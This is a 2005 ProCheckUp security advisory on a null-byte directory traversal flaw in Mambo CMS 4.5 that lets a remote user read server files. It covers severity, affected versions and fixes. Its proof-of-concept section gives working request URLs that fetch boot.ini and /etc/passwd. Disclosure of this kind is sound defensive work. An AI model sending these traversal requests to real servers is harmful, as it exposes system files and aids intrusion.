Mambo CMS vulnerable to a remote file downloading attack

Vulnerability found:

11 March 2005

Severity level:

Low

Credits:

Gemma Hughes of ProCheckUp Ltd

Description:

Mambo CMS vulnerable to a remote file downloading attack when installed on a server with a badly configured PHP installation. This could allow malicious attackers to gain access to sensitive information about the server that is hosting the Mambo CMS-managed site. This vulnerability is only exploitable where the magic_quotes_gpc is set to 'Off' in the PHP configuration of the server. It should be noted that this configuration is specifically warned against during the installation of the Mambo CMS, and as such, sites with the configuration allowing this exploit are likely to be uncommon.
The exploit functions due to the null character attached to the end of the query string, which prevents further execution of the program after echoing the output of the file to the screen.

Consequences

An attacker could obtain confidential information that may aid a further attack.
Notes
The risk associated with this vulnerability is low, because the number of servers with a configuration allowing this kind of exploit is likely to be low. In the default php.ini-dist file included in PHP distributions, magic_quotes_gpc is set to On, and this problem will not be encountered. However, for reasons of performance, in the php.ini-recommended file, magic_quotes_gpc is set to Off, and this configuration may be being utilised by many people.

This advisory has been published following consultation with UK NISCC

Vulnerable

Tested with Mambo 4.5 (1.0.3) running on Windows 2000 and Linux systems. Other versions may be affected, but this has not been verified. Mambo was tested on PHP 4.3.10.


Proof of concept:

Proof of concept for Windows servers:
http://target/index2.php?no_html=1&option=../../../../../../../../../../../../../../../../../../boot.ini%00
Result:
The contents of boot.ini are echoed to the client.
Proof of concept for Linux servers:
http://target/index2.php?no_html=1&option=../../../../../../../../../../../../../../../../../../etc/passwd%00
Result:
The contents of /etc/passwd are echoed to the client.


How to fix:

Ensure all characters are filtered from all inputs, including the '../' characters that allow directory traversal. Enable magic_quotes_gpc within PHP.
The security advice from Mambo is as follows:
Anyone running 4.5 (1.0.x) should certainly upgrade to 4.5 (1.0.9 plus security fix) immediately. Or make an immediate jump to 4.5.2.3 (the current release).

Anyone running 4.5 (1.0.9 plus security fix) may wish to upgrade to 4.5.2.3 in order to run the latest plugins and to have the latest stable version.

Anyone running 4.5.1 or above is advised to move to 4.5.2.3 or to install 4.5.3 when it is released

Legal:

Copyright 2005 ProCheckUp Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not changed or edited in any way, is attributed to ProCheckUp, and provided such reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. ProCheckUp is not liable for any misuse of this information by any third party.